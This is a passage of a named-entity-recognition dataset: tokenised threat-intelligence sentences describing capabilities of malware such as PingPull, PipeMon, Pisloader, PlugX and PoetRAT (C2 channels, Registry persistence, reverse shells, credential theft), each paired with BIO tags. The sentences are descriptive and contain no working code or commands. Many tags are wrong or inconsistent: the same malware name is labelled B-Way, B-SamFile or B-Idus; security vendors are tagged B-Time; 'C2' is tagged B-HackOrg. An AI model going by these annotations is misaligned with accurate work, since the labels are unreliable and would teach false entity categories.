- "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Ping", - "can", - "be", - "used", - "to", - "identify", - "remote", - "systems", - "within", - "a", - "network." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "can", - "collect", - "data", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "can", - "decrypt", - "received", - "data", - "from", - "its", - "C2", - "server", - "by", - "using", - "AES." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PingPull", - "has", - "the", - "ability", - "to", - "exfiltrate", - "stolen", - "victim", - "data", - "through", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "can", - "enumerate", - "storage", - "volumes", - "and", - "folder", - "contents", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "can", - "mimic", - "the", - "names", - "and", - "descriptions", - "of", - "legitimate", - "services", - "such", - "as", - "`iphlpsvc`,", - "`IP", - "Helper`,", - "and", - "`Onedrive`", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SecTeam", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "variants", - "have", - "the", - "ability", - "to", - "communicate", - "with", - "C2", - "servers", - "using", - "ICMP", - "or", - "TCP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PingPull", - "can", - "use", - "HTTPS", - "over", - "port", - "8080", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "can", - "encode", - "C2", - "traffic", - "with", - "Base64." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "can", - "use", - "AES,", - "in", - "cipher", - "block", - "chaining", - "(CBC)", - "mode", - "padded", - "with", - "PKCS5,", - "to", - "encrypt", - "C2", - "server", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "can", - "retrieve", - "the", - "hostname", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "can", - "retrieve", - "the", - "IP", - "address", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "has", - "the", - "ability", - "to", - "timestomp", - "a", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "A", - "PingPull", - "variant", - "can", - "communicate", - "with", - "its", - "C2", - "servers", - "by", - "using", - "HTTPS." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PingPull", - "can", - "use", - "`cmd.exe`", - "to", - "run", - "various", - "commands", - "as", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PingPull", - "has", - "the", - "ability", - "to", - "install", - "itself", - "as", - "a", - "service." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "installer", - "can", - "use", - "UAC", - "bypass", - "techniques", - "to", - "install", - "the", - "payload." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon,", - "its", - "installer,", - "and", - "tools", - "are", - "signed", - "with", - "stolen", - "code-signing", - "certificates." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "attempt", - "to", - "gain", - "administrative", - "privileges", - "using", - "token", - "impersonation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "decrypt", - "password-protected", - "executables." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "inject", - "its", - "modules", - "into", - "various", - "processes", - "using", - "reflective", - "DLL", - "loading." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "modules", - "are", - "stored", - "encrypted", - "on", - "disk." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "switch", - "to", - "an", - "alternate", - "C2", - "domain", - "when", - "a", - "particular", - "date", - "has", - "been", - "reached." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "has", - "stored", - "its", - "encrypted", - "payload", - "in", - "the", - "Registry", - "under", - "`HKLM\\SOFTWARE\\Microsoft\\Print\\Components\\`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "install", - "additional", - "modules", - "via", - "C2", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "modules", - "are", - "stored", - "on", - "disk", - "with", - "seemingly", - "benign", - "names", - "including", - "use", - "of", - "a", - "file", - "extension", - "associated", - "with", - "a", - "popular", - "word", - "processor." - ], - "ner_tags": [ - "B-SamFile", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "has", - "modified", - "the", - "Registry", - "to", - "store", - "its", - "encrypted", - "payload." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon's", - "first", - "stage", - "has", - "been", - "executed", - "by", - "a", - "call", - "to", - "<code>CreateProcess</code>", - "with", - "the", - "decryption", - "password", - "in", - "an", - "argument.", - "PipeMon", - "has", - "used", - "a", - "call", - "to", - "<code>LoadLibrary</code>", - "to", - "load", - "its", - "installer." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "PipeMon", - "communication", - "module", - "can", - "use", - "a", - "custom", - "protocol", - "based", - "on", - "TLS", - "over", - "TCP." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "use", - "parent", - "PID", - "spoofing", - "to", - "elevate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "PipeMon", - "installer", - "has", - "modified", - "the", - "Registry", - "key", - "<code>HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\Windows", - "x64\\Print", - "Processors</code>", - "to", - "install", - "PipeMon", - "as", - "a", - "Print", - "Processor." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "iterate", - "over", - "the", - "running", - "processes", - "to", - "find", - "a", - "suitable", - "injection", - "target." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "check", - "for", - "the", - "presence", - "of", - "ESET", - "and", - "Kaspersky", - "security", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "B-Time", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "has", - "used", - "call", - "to", - "<code>LoadLibrary</code>", - "to", - "load", - "its", - "installer.", - "PipeMon", - "loads", - "its", - "modules", - "using", - "reflective", - "loading", - "or", - "custom", - "shellcode." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "communications", - "are", - "RC4", - "encrypted." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "collect", - "and", - "send", - "OS", - "version", - "and", - "computer", - "name", - "as", - "a", - "part", - "of", - "its", - "C2", - "beacon." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "collect", - "and", - "send", - "the", - "local", - "IP", - "address,", - "RDP", - "information,", - "and", - "the", - "network", - "adapter", - "physical", - "address", - "as", - "a", - "part", - "of", - "its", - "C2", - "beacon." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "send", - "time", - "zone", - "information", - "from", - "a", - "compromised", - "host", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PipeMon", - "can", - "establish", - "persistence", - "by", - "registering", - "a", - "malicious", - "DLL", - "as", - "an", - "alternative", - "Print", - "Processor", - "which", - "is", - "loaded", - "when", - "the", - "print", - "spooler", - "service", - "starts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pisloader", - "uses", - "DNS", - "as", - "its", - "C2", - "protocol." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pisloader", - "has", - "commands", - "to", - "list", - "drives", - "on", - "the", - "victim", - "machine", - "and", - "to", - "list", - "file", - "information", - "for", - "a", - "given", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pisloader", - "has", - "a", - "command", - "to", - "upload", - "a", - "file", - "to", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pisloader", - "obfuscates", - "files", - "by", - "splitting", - "strings", - "into", - "smaller", - "sub-strings", - "and", - "including", - "\"garbage\"", - "strings", - "that", - "are", - "never", - "used.", - "The", - "malware", - "also", - "uses", - "return-oriented", - "programming", - "(ROP)", - "technique", - "and", - "single-byte", - "XOR", - "to", - "obfuscate", - "data." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pisloader", - "establishes", - "persistence", - "via", - "a", - "Registry", - "Run", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Responses", - "from", - "the", - "Pisloader", - "C2", - "server", - "are", - "base32-encoded." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Pisloader", - "has", - "a", - "command", - "to", - "collect", - "victim", - "system", - "information,", - "including", - "the", - "system", - "name", - "and", - "OS", - "version." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pisloader", - "has", - "a", - "command", - "to", - "collect", - "the", - "victim's", - "IP", - "address." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Pisloader", - "uses", - "cmd.exe", - "to", - "set", - "the", - "Registry", - "Run", - "key", - "value.", - "It", - "also", - "has", - "a", - "command", - "to", - "spawn", - "a", - "command", - "shell." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "has", - "the", - "ability", - "to", - "use", - "DLL", - "search", - "order", - "hijacking", - "for", - "installation", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "has", - "used", - "DLL", - "side-loading", - "to", - "evade", - "anti-virus." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "can", - "be", - "configured", - "to", - "use", - "DNS", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "uses", - "Pastebin", - "to", - "store", - "C2", - "addresses." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "decompresses", - "and", - "decrypts", - "itself", - "using", - "the", - "Microsoft", - "API", - "call", - "RtlDecompressBuffer." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PlugX", - "has", - "a", - "module", - "to", - "enumerate", - "drives", - "and", - "find", - "files", - "recursively." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "can", - "modify", - "the", - "characteristics", - "of", - "folders", - "to", - "hide", - "them", - "from", - "the", - "compromised", - "user." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "has", - "a", - "module", - "to", - "download", - "and", - "execute", - "files", - "on", - "the", - "compromised", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "has", - "a", - "module", - "for", - "capturing", - "keystrokes", - "per", - "process", - "including", - "window", - "titles." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "version", - "of", - "PlugX", - "loads", - "as", - "shellcode", - "within", - "a", - ".NET", - "Framework", - "project", - "using", - "msbuild.exe,", - "presumably", - "to", - "bypass", - "application", - "control", - "techniques." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "In", - "one", - "instance,", - "menuPass", - "added", - "PlugX", - "as", - "a", - "service", - "with", - "a", - "display", - "name", - "of", - "\"Corel", - "Writing", - "Tools", - "Utility.\"" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "has", - "been", - "disguised", - "as", - "legitimate", - "Adobe", - "and", - "PotPlayer", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "has", - "a", - "module", - "to", - "create,", - "delete,", - "or", - "modify", - "Registry", - "keys." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "PlugX", - "can", - "use", - "the", - "Windows", - "API", - "functions", - "`GetProcAddress`,", - "`LoadLibrary`,", - "and", - "`CreateProcess`", - "to", - "execute", - "another", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "has", - "a", - "module", - "to", - "enumerate", - "network", - "shares." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "can", - "be", - "configured", - "to", - "use", - "raw", - "TCP", - "or", - "UDP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "can", - "use", - "API", - "hashing", - "and", - "modify", - "the", - "names", - "of", - "strings", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "has", - "a", - "module", - "to", - "list", - "the", - "processes", - "running", - "on", - "a", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "can", - "enumerate", - "and", - "query", - "for", - "information", - "contained", - "within", - "the", - "Windows", - "Registry." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "adds", - "Run", - "key", - "entries", - "in", - "the", - "Registry", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "allows", - "the", - "operator", - "to", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "PlugX", - "can", - "use", - "RC4", - "encryption", - "in", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "checks", - "if", - "VMware", - "tools", - "is", - "running", - "in", - "the", - "background", - "by", - "searching", - "for", - "any", - "process", - "named", - "\"vmtoolsd\"." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PlugX", - "has", - "a", - "module", - "for", - "enumerating", - "TCP", - "and", - "UDP", - "network", - "connections", - "and", - "associated", - "processes", - "using", - "the", - "<code>netstat</code>", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "can", - "be", - "configured", - "to", - "use", - "HTTP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "allows", - "actors", - "to", - "spawn", - "a", - "reverse", - "shell", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PlugX", - "can", - "be", - "added", - "as", - "a", - "service", - "to", - "establish", - "persistence.", - "PlugX", - "also", - "has", - "a", - "module", - "to", - "change", - "service", - "configurations", - "as", - "well", - "as", - "start,", - "control,", - "and", - "delete", - "services." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "the", - "ability", - "to", - "compress", - "files", - "with", - "zip." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "used", - "TLS", - "to", - "encrypt", - "command", - "and", - "control", - "(C2)", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "used", - "file", - "system", - "monitoring", - "to", - "track", - "modification", - "and", - "enable", - "automatic", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Tool", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "`pyminifier`", - "to", - "obfuscate", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "executed", - "a", - "Lua", - "script", - "through", - "a", - "Lua", - "interpreter", - "for", - "Windows." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "a", - "Python", - "tool", - "named", - "Browdec.exe", - "to", - "steal", - "browser", - "credentials." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "LZMA", - "and", - "base64", - "libraries", - "to", - "decode", - "obfuscated", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "was", - "delivered", - "with", - "documents", - "using", - "DDE", - "to", - "execute", - "malicious", - "code." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "a", - ".NET", - "tool", - "named", - "dog.exe", - "to", - "exiltrate", - "information", - "over", - "an", - "e-mail", - "account." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "exfiltrated", - "data", - "over", - "the", - "C2", - "channel." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "ftp", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "the", - "ability", - "to", - "overwrite", - "scripts", - "and", - "delete", - "itself", - "if", - "a", - "sandbox", - "environment", - "is", - "detected." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "FTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "the", - "ability", - "to", - "list", - "files", - "upon", - "receiving", - "the", - "<code>ls</code>", - "command", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "the", - "ability", - "to", - "hide", - "and", - "unhide", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "the", - "ability", - "to", - "copy", - "files", - "and", - "download/upload", - "files", - "into", - "C2", - "channels", - "using", - "FTP", - "and", - "HTTPS." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "a", - "Python", - "tool", - "named", - "klog.exe", - "for", - "keylogging." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "used", - "voStro.exe,", - "a", - "compiled", - "pypykatz", - "(Python", - "version", - "of", - "Mimikatz),", - "to", - "steal", - "credentials." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "spearphishing", - "attachments", - "to", - "infect", - "victims." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "made", - "registry", - "modifications", - "to", - "alter", - "its", - "behavior", - "upon", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "used", - "TLS", - "to", - "encrypt", - "communications", - "over", - "port", - "143" - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "PoetRAT", - "has", - "used", - "a", - "custom", - "encryption", - "scheme", - "for", - "communication", - "between", - "scripts." - ], 